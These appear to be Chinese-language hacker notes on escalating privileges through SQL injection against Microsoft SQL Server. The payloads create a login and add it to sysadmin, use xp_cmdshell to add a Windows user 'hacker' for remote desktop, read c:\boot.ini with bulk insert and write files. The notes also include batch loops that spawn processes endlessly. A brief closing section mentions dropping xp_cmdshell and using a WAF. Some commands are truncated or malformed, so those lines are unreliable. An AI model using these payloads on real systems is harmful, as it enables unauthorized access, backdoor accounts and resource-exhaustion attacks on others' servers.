1.数据库的提权

one：        先要建立数据库的用户，再将用户加入到sysadmin组（报错才是可能可以注入）

语句：  ;exec master..sp_addlogin hyqkx1977,888888;--

two:把用户加入到sysadmin

three:查看数据用户

four:利用漏洞

数据库连接器：查询分析器--文件--连接：数据库服务器ip

2.操作系统的提权

one.建立操作系统的用户。

；exec master..xp_cmdshell 'net user hacker 88888 /add' --

two.将建立的用户加入administrastors组

;exec master..xp_cmdshell '

three:利用远程桌面连接：port 3389

3.能读系统文件

one:利用查询分析器连接数据库

two:create table tablename(....)

three bulk insert vvboot from 'c:\boot.ini'

four:select * from vvboot

4.能向系统写文件

装逼批处理代码：

cmd.cmd

start " good" /high cmd.cmd & exit

a.bat

:1

start iexplore.exe

goto 1

写文件

;exec master..xp_cmdshell 'echo aaa >>c:u.txt'--(两个大于号代表追加)

5.防xp_cmdshell

;exec master..sp_dropextendedproc 'xp_cmdshell'

终极防:

xp_cmdshell,防未公布溢出漏洞

删除所有权限，添加administrstor--完全控制

6.注入防范

WAF